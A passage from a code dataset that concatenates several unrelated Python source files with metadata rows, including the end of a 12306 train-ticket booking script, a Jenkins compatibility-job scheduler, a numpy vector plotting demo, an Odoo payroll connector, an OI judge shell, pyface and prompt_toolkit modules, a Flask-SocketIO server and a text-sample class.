and obj['status'] and obj['data']['submitStatus']):
print(u'订单排队中...')
return RET_OK
else:
print(u'提交订单排队失败')
dumpObj(obj)
return RET_ERR
def queryOrderWaitTime(self):
print(u'等待订单流水号...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?random=%13d&tourFlag=dc&_json_att=&REPEAT_SUBMIT_TOKEN=%s' % (
random.randint(1000000000000, 1999999999999), self.repeatSubmitToken)
r = self.get(url)
if not r:
print(u'等待订单流水号异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":4,"requestId":5944637152210732219,"waitCount":2,"tourFlag":"dc","orderId":null},"messages":[],"validateMessages":{}}
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":-1,"requestId":5944637152210732219,"waitCount":0,"tourFlag":"dc","orderId":"E739900792"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['orderId'])
and obj['status']
and obj['data']['orderId']):
print(u'等待订单流水号失败')
dumpObj(obj)
return RET_ERR
self.orderId = obj['data']['orderId']
if (self.orderId and self.orderId != 'null'):
print(u'订单流水号为:')
print(self.orderId)
return RET_OK
else:
print(u'等待订单流水号失败')
return RET_ERR
def payOrder(self):
print(u'等待订票结果...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue'
parameters = [
('orderSequence_no', self.orderId),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'等待订票结果异常')
return RET_ERR
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'submitStatus':true},'messages':[],'validateMessages':{}}
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'errMsg':'获取订单信息失败,请查看未完成订单,继续支付!','submitStatus':false},'messages':[],'validateMessages':{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'等待订票结果失败')
dumpObj(obj)
return RET_ERR
url = 'https://kyfw.12306.cn/otn//payOrder/init?random=%13d' % (
random.randint(1000000000000, 1999999999999))
parameters = [
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'请求异常')
return RET_ERR
data = r.text
if data.find(u'席位已锁定') != -1:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
return RET_OK
else:
return RET_ERR
def queryMyOrderNotComplete(self):
print(u'正在查询未完成订单...')
url = 'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询未完成订单异常')
return RET_ERR
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus', 'data']) and obj['status']):
print(u'查询未完成订单失败')
dumpObj(obj)
return RET_ERR
if (hasKeys(obj['data'], ['orderDBList']) and len(obj['data']['orderDBList'])):
print(u'查询到有未完成订单,请先处理')
return RET_OK
if (
hasKeys(obj['data'], ['orderCacheDTO'])
and obj['data']['orderCacheDTO']
and hasKeys(obj['data']['orderCacheDTO'], ['status'])):
if obj['data']['orderCacheDTO']['status'] == 0:
print(u'查询到cache有未完成订单,请先处理')
return RET_OK
else:
if (hasKeys(obj['data']['orderCacheDTO'], ['message'])):
dumpObj(obj['data']['orderCacheDTO']['message'])
return RET_ERR
def main():
print(getTime())
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='Specify config file')
parser.add_argument('-u', '--username', help='Specify username to login')
parser.add_argument('-p', '--password', help='Specify password to login')
parser.add_argument('-d', '--date', help='Specify train date, 2014-01-01')
parser.add_argument('-m', '--mail', help='Send email notification')
args = parser.parse_args()
order = MyOrder()
order.initSession()
order.initStation()
if args.config:
        order.readConfig(args.config)  # use the specified config file
else:
        order.readConfig()  # use the default config file config.ini
if args.username:
        order.username = args.username  # override the username from the config file
if args.password:
        order.password = args.password  # override the password from the config file
if args.date:
if checkDate(args.date):
            order.train_date = args.date  # override the travel date from the config file
else:
print(u'乘车日期无效, 请重新选择')
order.train_date = selectDate()
if args.mail:
        # send a mail notification automatically when tickets become available
order.notify['mail_enable'] = 1 if args.mail == '1' else 0
tries = 0
while tries < MAX_TRIES:
tries += 1
if order.login() == RET_OK:
break
else:
print(u'失败次数太多,自动退出程序')
sys.exit()
order.selectPassengers(1)
while True:
time.sleep(1)
        # query remaining tickets
if order.queryTickets() != RET_OK:
continue
        # print the query result
if order.printTrains() != RET_OK:
continue
        # pick one of the actions listed in the menu
action = order.selectAction()
if action == -1:
continue
elif action == 0:
break
        # initialize the order
if order.initOrder() != RET_OK:
continue
        # check the order info
if order.checkOrderInfo() != RET_OK:
continue
        # query queue length and remaining tickets (optional)
        # if order.getQueueCount() != RET_OK:
        #     continue
        # submit the order to the queue
tries = 0
while tries < 2:
tries += 1
if order.confirmSingleForQueue() == RET_OK:
break
        # get the orderId
tries = 0
while tries < 2:
tries += 1
if order.queryOrderWaitTime() == RET_OK:
break
        # formally submit the order (payment step)
if order.payOrder() == RET_OK:
break
        # check the outstanding-orders page to confirm whether the booking succeeded
if order.queryMyOrderNotComplete() == RET_OK:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
break
print(getTime())
raw_input('Press any key to continue')
if __name__ == '__main__':
main()
# EOF
|
gpl-2.0
| -631,110,503,267,683,200
| 37.075581
| 273
| 0.491627
| false
| 3.173478
| false
| false
| false
|
mjs/juju
|
acceptancetests/schedule_hetero_control.py
|
1
|
3284
|
#!/usr/bin/env python
from __future__ import print_function
from argparse import ArgumentParser
import json
import os
import re
from jenkins import Jenkins
from jujuci import (
add_credential_args,
get_credentials,
)
from utility import (
find_candidates,
get_candidates_path,
)
def get_args(argv=None):
parser = ArgumentParser()
parser.add_argument(
'root_dir', help='Directory containing releases and candidates dir')
parser.add_argument(
'--all', action='store_true', default=False,
help='Schedule all candidates for client-server testing.')
add_credential_args(parser)
args = parser.parse_args(argv)
return args, get_credentials(args)
def get_releases(root):
release_path = os.path.join(root, 'old-juju')
    released_pattern = re.compile(r'^\d+\.\d+\.\d+[^~]*$')
for entry in os.listdir(release_path):
if not os.path.isdir(os.path.join(release_path, entry)):
continue
if released_pattern.match(entry):
yield entry
def get_candidate_info(candidate_path):
""" Return candidate version and revision build number. """
with open(os.path.join(candidate_path, 'buildvars.json')) as fp:
build_vars = json.load(fp)
return build_vars['version'], build_vars['revision_build']
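# calculate_jobs(): pair each candidate build with every compatible release in
# both client/server directions, once per client OS.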
def calculate_jobs(root, schedule_all=False):
releases = list(get_releases(root))
candidates_path = get_candidates_path(root)
for candidate_path in find_candidates(root, schedule_all):
parent, candidate = os.path.split(candidate_path)
if candidate.startswith('1.26'):
# 1.26 was renamed to 2.0 because it is not compatible with 1.x
continue
if parent != candidates_path:
raise ValueError('Wrong path')
candidate_version, revision_build = get_candidate_info(candidate_path)
for release in releases:
# Releases with the same major number must be compatible.
if release[:2] != candidate[:2]:
continue
for client_os in ('ubuntu', 'osx', 'windows'):
yield {
'old_version': release, # Client
'candidate': candidate_version, # Server
'new_to_old': 'true',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
yield {
'old_version': release, # Server
'candidate': candidate_version, # Client
'new_to_old': 'false',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
def build_jobs(credentials, root, jobs):
jenkins = Jenkins('http://juju-ci.vapour.ws:8080', *credentials)
os_str = {"ubuntu": "", "osx": "-osx", "windows": "-windows"}
for job in jobs:
jenkins.build_job(
'compatibility-control{}'.format(os_str[job['client_os']]), job)
def main():
args, credentials = get_args()
build_jobs(
credentials, args.root_dir, calculate_jobs(args.root_dir, args.all))
if __name__ == '__main__':
main()
|
agpl-3.0
| 8,702,900,788,134,910,000
| 32.510204
| 78
| 0.58648
| false
| 4.03936
| false
| false
| false
|
NicovincX2/Python-3.5
|
Algèbre/Opération/scalar_product.py
|
1
|
1933
|
# -*- coding: utf-8 -*-
import os
import seaborn
seaborn.set()
colors = seaborn.color_palette()
import utils
# The script relies on pylab-style names; import them explicitly so it runs standalone.
from numpy import zeros, cross, arccos, dot, pi
from numpy.random import rand, randn
from numpy.linalg import norm
from matplotlib.pyplot import figure, legend
# For 3D plotting we need to import some extra stuff
from mpl_toolkits.mplot3d import Axes3D
# First create two random vectors in 3 dimensional space
v1 = rand(3, 1)
v2 = rand(3, 1)
# And scale them to unit length
v1 = v1 / norm(v1)
v2 = v2 / norm(v2)
# Plot the vectors
o = zeros(3) # origin
# We'll use the object oriented plotting interface
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
for i in range(100):
# generate a point that is a weighted sum of the 2 vectors
w1 = randn(1)
w2 = randn(1)
point = w1 * v1 + w2 * v2
ax.plot(*point, marker=".", color="k")
# We can find a vector that is orthogonal to the plane defined by v1 and v2
# by taking the vector cross product. See the wikipedia page for a
# definition of cross product
# Must be right shape for cross()
v3 = cross(v1.reshape(1, 3), v2.reshape(1, 3)).squeeze()
ax.plot(*[[o[i], v3[i]] for i in range(3)],
linewidth=3, label="orthogonal vector")
legend()
print(v3[0] * v1[0] + v3[1] * v1[1] + v3[2] * v1[2])
print(dot(v3, v1))
theta = arccos(dot(v2.T, v1)).squeeze()
# and radians can be converted to degrees
theta_deg = theta * (180 / pi)
print(theta, theta_deg)
os.system("pause")
|
gpl-3.0
| -667,495,029,262,324,100
| 28.287879
| 75
| 0.644594
| false
| 2.647945
| false
| false
| false
|
nuobit/odoo-addons
|
connector_sage/models/payroll_sage_payslip_line_payroll/binding.py
|
1
|
1439
|
# Copyright NuoBiT Solutions, S.L. (<https://www.nuobit.com>)
# Eric Antones <eantones@nuobit.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl)
from odoo import models, fields
from odoo.addons.queue_job.job import job
class PayslipLinePayrollBinding(models.Model):
_name = 'sage.payroll.sage.payslip.line.payroll'
_inherit = 'sage.payroll.sage.payslip.line'
_sql_constraints = [
('uniq',
'unique(sage_codigo_empresa, sage_codigo_convenio, sage_fecha_registro_cv, '
'sage_ano, sage_mesd, sage_tipo_proceso, '
'sage_codigo_empleado, sage_codigo_concepto_nom)',
'Payroll Payslip with same ID on Sage already exists.'),
]
@job(default_channel='root.sage')
def import_payslip_lines(self, payslip_id, backend_record):
""" Prepare the import of payslip from Sage """
filters = {
'CodigoEmpresa': backend_record.sage_company_id,
'CodigoConvenio': payslip_id.labour_agreement_id.code,
'FechaRegistroCV': fields.Date.from_string(payslip_id.labour_agreement_id.registration_date_cv),
'Año': payslip_id.year,
'MesD': ('between', (payslip_id.month_from, payslip_id.month_to)),
'TipoProceso': payslip_id.process,
}
self.env['sage.payroll.sage.payslip.line.payroll'].import_batch(
backend=backend_record, filters=filters)
return True
|
agpl-3.0
| 8,891,023,557,051,853,000
| 36.842105
| 108
| 0.649513
| false
| 3.139738
| false
| false
| false
|
cuihaoleo/PyTest
|
PyTest.py
|
1
|
7675
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
##
# PyTest.py
# This file is part of PyTest.
#
# PyTest
# An OI (Olympiad in Informatics) judge backend written in Python
# Copyright (C) 2011 CUI Hao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: 崔灏 (CUI Hao)
# Email: cuihao.leo@gmail.com
##
import cmd
import os
import shlex
import pickle
from PlayerClass import PyTest_Player
from ProblemClass import PyTest_Problem
from ProblemConfig import Cfg2Prob
class PyTest_Cmd (cmd.Cmd):
def __init__ (self):
cmd.Cmd.__init__(self)
self.prompt = "(PyTest) "
self.Name = "Unnamed"
self.Players = {}
self.Problems = {}
self.do_EOF = self.do_quit
def AddProb (self, cfg):
try:
prob = Cfg2Prob(cfg)
except Exception as exp:
print("无法添加题目 %s : 导入时发生错误")
print(exp)
else:
if prob.Name in self.Problems.keys():
print("无法添加题目 %s : 相同名称的题目已存在" % prob.Name)
else:
self.Problems[prob.Name] = prob
print("添加题目 %s" % prob.Name)
def AddPlayer (self, path):
try:
player = PyTest_Player(path)
except Exception as exp:
print("无法添加选手 %s : 导入时发生错误")
print(exp)
else:
if player.Name in self.Players.keys():
print("无法添加选手 %s : 相同名称的对象已存在" % player.Name)
else:
self.Players[player.Name] = player
print("添加选手 %s" % player.Name)
def DelProb (self, name):
try:
del self.Problems[name]
except KeyError:
print("无法删除题目 %s : 题目不存在" % name)
else:
print("删除题目 %s" % name)
def DelPlayer (self, name):
try:
del self.Players[name]
except KeyError:
print("无法删除选手 %s : 对象不存在" % name)
else:
print("删除选手 %s" % name)
def Testit (self, pl, pr):
try:
player = self.Players[pl]
except KeyError:
print("未知用户 %s" % pl)
return
try:
prob = self.Problems[pr]
except KeyError:
print("未知用户 %s" % pr)
return
player.Do(prob)
def help_quit (self):
print("quit")
print("退出")
def do_quit (self, line):
exit()
def help_name (self):
print("name [@名称]")
print("设置评测名称。若没有提供,显示当前名称")
    def do_name (self, name):
        # the judge name is stored directly on self.Name
        if len(name.strip()) == 0:
            print(self.Name)
        else:
            self.Name = name
def help_addprob (self):
print("addprob @配置文件1 [@配置文件2 [...]]")
print("添加题目")
def do_addprob (self, line):
for path in shlex.split(line):
self.AddProb(path)
def help_delprob (self):
print("delprob @题目1 [@题目2 [...]]")
print("删除题目")
def do_delprob (self, line):
for name in shlex.split(line):
self.DelProb(name)
def help_prob (self):
print("prob")
print("显示所有题目")
def do_prob (self, line):
for p in self.Problems:
print("%s: %s" % (p, self.Problems[p].CfgFile))
def help_add (self):
print("add @目录1 [@目录2 [...]]")
print("添加选手")
def do_add (self, line):
for path in shlex.split(line):
self.AddPlayer(path)
def help_addall (self):
print("addall @目录1 [@目录2 [...]]")
print("添加目录中的所有文件夹作为选手")
def do_addall (self, line):
for path in shlex.split(line):
try:
paths = next(os.walk(path))[1]
except StopIteration:
continue
for f in paths:
self.AddPlayer(os.path.join(path, f))
def help_del (self):
print("del @选手1 [@选手2 [...]]")
print("删除选手")
def do_del (self, line):
for name in shlex.split(line):
self.DelPlayer(name)
def help_player (self):
print("player")
print("显示所有选手")
def do_player (self, line):
for p in self.Players:
print("%s: %s" % (p, self.Players[p].Path))
def help_rec (self):
print("rec @选手 @题目")
print("显示详细评测信息")
def do_rec (self, line):
arg = shlex.split(line)
if len(arg)==2:
pl, pr = arg
else:
return
try:
li = self.Players[pl].Record[pr]
except KeyError:
print("记录不存在")
return
for idx in li:
print()
print("[测试#%s]" % idx)
for dic in li[idx]:
print("<文件 %s>" % dic.get("file", ""))
print("信息: %s" % dic.get("msg", ""))
print("得分: %s" % dic.get("score", ""))
def help_print (self):
print("打印Python表达式")
def do_print (self, line):
try:
print(eval(line))
except Exception as err:
print(err)
def help_test (self):
print("启动测试")
def do_test (self, line):
arg = shlex.split(line)
if len(arg) == 2:
            self.Testit(*arg)
elif len(arg) == 0:
pls = input("测试对象(默认全部):").split()
prs = input("题目(默认全部):").split()
if len(pls) == 0:
pls = self.Players.keys()
if len(prs) == 0:
prs = self.Problems.keys()
for player in pls:
for prob in prs:
self.Testit(player, prob)
print()
def help_save (self):
print("储存本次测试")
def do_save (self, line):
path = shlex.split(line)[0]
if os.path.lexists(path):
while True:
ch = input("文件已存在,是否覆盖(Y/N)?")
if ch in ("y", "Y"):
break
elif ch in ("n", "N"):
return
f = open(path, "wb")
pickle.dump(self.Name, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Players, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Problems, f, pickle.HIGHEST_PROTOCOL)
f.close()
def help_load (self):
print("加载测试")
def do_load (self, line):
path = shlex.split(line)[0]
try:
f = open(path, "rb")
except IOError as err:
print(err)
return
self.Name = pickle.load(f)
self.Players = pickle.load(f)
self.Problems = pickle.load(f)
if __name__ == '__main__':
pytest = PyTest_Cmd()
pytest.cmdloop()
|
gpl-3.0
| 1,755,466,251,019,039,200
| 26
| 71
| 0.508379
| false
| 3.098168
| true
| false
| false
|
geggo/pyface
|
pyface/workbench/i_workbench_window_layout.py
|
3
|
10821
|
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" The workbench window layout interface. """
# Enthought library imports.
from traits.api import Event, HasTraits, Instance, Interface, Str
from traits.api import provides
# Local imports.
from .i_editor import IEditor
from .i_view import IView
class IWorkbenchWindowLayout(Interface):
""" The workbench window layout interface.
Window layouts are responsible for creating and managing the internal
structure of a workbench window (it knows how to add and remove views and
editors etc).
"""
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
# FIXME v3: The "just for convenience" returns are a really bad idea.
#
# Why? They allow the call to be used on the LHS of an expression...
# Because they have nothing to do with what the call is supposed to be
# doing, they are unlikely to be used (because they are so unexpected and
# inconsistently implemented), and only serve to replace two shorter lines
# of code with one long one, arguably making code more difficult to read.
def activate_editor(self, editor):
""" Activate an editor.
Returns the editor (just for convenience).
"""
def activate_view(self, view):
""" Activate a view.
Returns the view (just for convenience).
"""
def add_editor(self, editor, title):
""" Add an editor.
Returns the editor (just for convenience).
"""
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view.
Returns the view (just for convenience).
"""
def close_editor(self, editor):
""" Close an editor.
Returns the editor (just for convenience).
"""
def close_view(self, view):
""" Close a view.
FIXME v3: Currently views are never 'closed' in the same sense as an
editor is closed. When we close an editor, we destroy its control.
When we close a view, we merely hide its control. I'm not sure if this
is a good idea or not. It came about after discussion with Dave P. and
he mentioned that some views might find it hard to persist enough state
that they can be re-created exactly as they were when they are shown
again.
Returns the view (just for convenience).
"""
def close(self):
""" Close the entire window layout.
FIXME v3: Should this be called 'destroy'?
"""
def create_initial_layout(self, parent):
""" Create the initial window layout.
Returns the layout.
"""
def contains_view(self, view):
""" Return True if the view exists in the window layout.
Note that this returns True even if the view is hidden.
"""
def hide_editor_area(self):
""" Hide the editor area.
"""
def hide_view(self, view):
""" Hide a view.
Returns the view (just for convenience).
"""
def refresh(self):
""" Refresh the window layout to reflect any changes.
"""
def reset_editors(self):
""" Activate the first editor in every group.
"""
def reset_views(self):
""" Activate the first view in every region.
"""
def show_editor_area(self):
""" Show the editor area.
"""
def show_view(self, view):
""" Show a view.
"""
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views.
"""
def set_view_memento(self, memento):
""" Restores the state of the views.
"""
def get_editor_memento(self):
""" Returns the state of the editors.
"""
def set_editor_memento(self, memento):
""" Restores the state of the editors.
"""
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
@provides(IWorkbenchWindowLayout)
class MWorkbenchWindowLayout(HasTraits):
""" Mixin containing common code for toolkit-specific implementations. """
#### 'IWorkbenchWindowLayout' interface ###################################
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
###########################################################################
# 'IWorkbenchWindowLayout' interface.
###########################################################################
def activate_editor(self, editor):
""" Activate an editor. """
raise NotImplementedError
def activate_view(self, view):
""" Activate a view. """
raise NotImplementedError
def add_editor(self, editor, title):
""" Add an editor. """
raise NotImplementedError
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view. """
raise NotImplementedError
def close_editor(self, editor):
""" Close an editor. """
raise NotImplementedError
def close_view(self, view):
""" Close a view. """
raise NotImplementedError
def close(self):
""" Close the entire window layout. """
raise NotImplementedError
def create_initial_layout(self, parent):
""" Create the initial window layout. """
raise NotImplementedError
def contains_view(self, view):
""" Return True if the view exists in the window layout. """
raise NotImplementedError
def hide_editor_area(self):
""" Hide the editor area. """
raise NotImplementedError
def hide_view(self, view):
""" Hide a view. """
raise NotImplementedError
def refresh(self):
""" Refresh the window layout to reflect any changes. """
raise NotImplementedError
def reset_editors(self):
""" Activate the first editor in every group. """
raise NotImplementedError
def reset_views(self):
""" Activate the first view in every region. """
raise NotImplementedError
def show_editor_area(self):
""" Show the editor area. """
raise NotImplementedError
def show_view(self, view):
""" Show a view. """
raise NotImplementedError
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views. """
raise NotImplementedError
def set_view_memento(self, memento):
""" Restores the state of the views. """
raise NotImplementedError
def get_editor_memento(self):
""" Returns the state of the editors. """
raise NotImplementedError
def set_editor_memento(self, memento):
""" Restores the state of the editors. """
raise NotImplementedError
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
return None
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
return
###########################################################################
# Protected 'MWorkbenchWindowLayout' interface.
###########################################################################
def _get_editor_references(self):
""" Returns a reference to every editor. """
editor_manager = self.window.editor_manager
editor_references = {}
for editor in self.window.editors:
# Create the editor reference.
#
# If the editor manager returns 'None' instead of a resource
# reference then this editor will not appear the next time the
# workbench starts up. This is useful for things like text files
# that have an editor but have NEVER been saved.
editor_reference = editor_manager.get_editor_memento(editor)
if editor_reference is not None:
editor_references[editor.id] = editor_reference
return editor_references
#### EOF ######################################################################
|
bsd-3-clause
| -4,267,509,263,042,674,000
| 26.675192
| 80
| 0.590796
| false
| 4.516277
| false
| false
| false
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/output/color_depth.py
|
1
|
1497
|
from __future__ import unicode_literals
from prompt_toolkit.utils import is_windows
import os
__all__ = [
'ColorDepth',
]
class ColorDepth(object):
"""
Possible color depth values for the output.
"""
#: One color only.
DEPTH_1_BIT = 'DEPTH_1_BIT'
#: ANSI Colors.
DEPTH_4_BIT = 'DEPTH_4_BIT'
#: The default.
DEPTH_8_BIT = 'DEPTH_8_BIT'
#: 24 bit True color.
DEPTH_24_BIT = 'DEPTH_24_BIT'
# Aliases.
MONOCHROME = DEPTH_1_BIT
ANSI_COLORS_ONLY = DEPTH_4_BIT
DEFAULT = DEPTH_8_BIT
TRUE_COLOR = DEPTH_24_BIT
_ALL = [DEPTH_1_BIT, DEPTH_4_BIT, DEPTH_8_BIT, DEPTH_24_BIT]
@classmethod
def default(cls, term=''):
"""
If the user doesn't specify a color depth, use this as a default.
"""
if term in ('linux', 'eterm-color'):
return cls.DEPTH_4_BIT
# For now, always use 4 bit color on Windows 10 by default, even when
# vt100 escape sequences with ENABLE_VIRTUAL_TERMINAL_PROCESSING are
# supported. We don't have a reliable way yet to know whether our
# console supports true color or only 4-bit.
if is_windows() and 'PROMPT_TOOLKIT_COLOR_DEPTH' not in os.environ:
return cls.DEPTH_4_BIT
# Check the `PROMPT_TOOLKIT_COLOR_DEPTH` environment variable.
if os.environ.get('PROMPT_TOOLKIT_COLOR_DEPTH') in cls._ALL:
return os.environ['PROMPT_TOOLKIT_COLOR_DEPTH']
return cls.DEPTH_8_BIT
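# Example usage (illustrative): pick a depth for the current terminal.
#     depth = ColorDepth.default(term=os.environ.get('TERM', ''))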
|
mit
| 2,101,513,724,883,425,300
| 27.245283
| 77
| 0.616566
| false
| 3.356502
| false
| false
| false
|
WorldViews/Spirals
|
dummyServer.py
|
1
|
2519
|
import json, time
import flask
from flask import Flask, render_template, send_file, \
jsonify, send_from_directory, request
from flask_socketio import SocketIO, emit
rdb = None
try:
import rethinkdb as rdb
#rdb.connect('localhost', 28015).repl()
conn = rdb.connect(db='test')
except:
print "*** Running without DB ***"
rdb = None
app = Flask(__name__, static_url_path='')
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
@app.route('/')
def index():
return send_file('index.html')
@app.route('/regp/', methods=['POST','GET'])
def reg():
print "reg path:", request.path
print "reg args", request.args
t = time.time()
name = request.args.get('name')
tagStr = request.args.get('tagStr')
clientType = request.args.get('clientType')
lon = float(request.args.get('longitude'))
lat = float(request.args.get('latitude'))
room = request.args.get('room')
numUsers = int(request.args.get('numUsers'))
obj = {'t': t, 'name': name, 'tagStr': tagStr,
'lon': lon, 'lat': lat, 'room': room,
'numUsers': numUsers, 'clientType': clientType}
print obj
return "ok"
@app.route('/Viewer/<path:path>')
def send(path):
print "send_page", path
return send_from_directory('Viewer', path)
@app.route('/Cesium/<path:path>')
def send_page(path):
print "send_page", path
return send_from_directory('Cesium', path)
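# /db/<etype>: dump every record of the given RethinkDB table as JSON,
# or an error object when no database connection is available.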
@app.route('/db/<path:etype>')
def query(etype):
#print "query", etype
t = time.time()
if rdb == None:
return flask.jsonify({'error': 'No DB', 't': t, 'records': []})
recs = rdb.table(etype).run(conn)
items = [x for x in recs]
obj = {'type': etype,
't' : t,
'records': items}
return flask.jsonify(obj)
@socketio.on('my event')
def test_message(message):
emit('my response', {'data': 'got it!'})
@socketio.on('chat')
def handle_chat(msg):
print "handle_chat:", msg
emit('chat', msg, broadcast=True)
addMsg(msg, 'chat')
@socketio.on('notes')
def handle_notes(msg):
print "handle_notes:", msg
emit('notes', msg, broadcast=True)
addMsg(msg, 'notes')
@socketio.on('people')
def handle_people(msg):
#print "handle_people:", msg
emit('people', msg, broadcast=True)
def addMsg(msgStr, etype):
obj = json.loads(msgStr)
rdb.table(etype).insert(obj).run(conn)
if __name__ == '__main__':
#socketio.run(app, port=80)
socketio.run(app, host="0.0.0.0", port=80)
|
mit
| -4,448,048,485,143,224,300
| 25.239583
| 71
| 0.613339
| false
| 3.08701
| false
| false
| false
|
nschaetti/nsNLP
|
data/Text.py
|
1
|
2476
|
# -*- coding: utf-8 -*-
#
# File : corpus/IQLACorpus.py
# Description : .
# Date : 16/08/2017
#
# Copyright Nils Schaetti, University of Neuchâtel <nils.schaetti@unine.ch>
# Imports
from Sample import Sample
import codecs
# Class to access to a text
class Text(Sample):
"""
Class to access to a text
"""
# Constructor
def __init__(self, text_path, author, text_title):
"""
Constructor
:param text_path:
:param author:
"""
super(Text, self).__init__(text_path, author)
self._text_path = text_path
self._author = author
self._title = text_title
# end __init__
########################################
# Public
########################################
# Get title
def get_title(self):
"""
Get title
:return:
"""
return self._title
# end get_title
# Get text
def get_text(self):
"""
Get text
:return:
"""
return codecs.open(self._text_path, 'r', encoding='utf-8').read()
# end text
# Save text
def save(self, text):
"""
Save text
:param text:
:return:
"""
return codecs.open(self._text_path, 'w', encoding='utf-8').write(text)
# end save
# Get author
def get_author(self):
"""
Get author
:return:
"""
return self._author
# end author
# Get path
def get_path(self):
"""
Get path
:return:
"""
return self._text_path
# end get_path
# Get X
def x(self):
"""
Get X
:return:
"""
return self.get_text()
# end x
# Get Y
def y(self):
"""
Get Y
:return:
"""
return self.get_author().get_name()
# end y
########################################
# Override
########################################
# To string
def __unicode__(self):
"""
To string
:return:
"""
return u"Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# To string
def __str__(self):
"""
To string
:return:
"""
return "Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# end Text
|
